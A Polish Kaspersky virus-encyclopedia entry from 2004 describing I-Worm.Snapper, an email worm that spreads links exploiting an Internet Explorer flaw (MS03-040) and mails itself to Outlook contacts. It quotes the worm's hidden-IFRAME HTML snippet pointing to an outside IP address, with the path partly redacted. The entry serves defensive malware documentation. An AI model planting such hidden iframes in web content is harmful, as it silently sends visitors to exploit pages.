Tylko teraz Kaspersky Total Security w cenie Kaspersky Internet Security!  Sprawdź ofertę »

X

I-Worm.Snapper - rozsyła łącze do zainfekowanej strony WWW

Jest to robak rozprzestrzeniający się przez internet za pośrednictwem wiadomości e-mail. Wysyłane przez niego wiadomości e-mail zawierają łącze do zainfekowanej strony WWW. Szkodnik ma postać pliku PE DLL o rozmiarze około 8 KB, instalowanego w folderze systemowym Windows i ładowanego jako biblioteka systemowa.

W treści zainfekowanej wiadomości znajduje się następujące łącze:

<HTML><BODY>
<IFRAME src='http://198.170.245.129/
[***].htm' style='display:none'></IFRAME>
</HTML></BODY>

Gdy użytkownik kliknie to łącze wykorzystywana jest luka w przeglądarce Internet Explorer (opisana w biuletynie firmy Microsoft - MS03-040. W rezultacie uruchamiany jest skrypt trojański, który wypakowuje z własnego kodu plik IELOAD.DLL - główny komponent robaka.

Korzystając z systemowego serwera SMTP szkodnik rozsyła niebezpieczne łącze do wszystkich użytkowników zapisanych w książce adresowej programu MS Outlook.



 2004-03-24  

© 1997 - 2016 Kaspersky Lab

Wszelkie prawa zastrzeżone.
Lider na rynku rozwišązań antywirusowych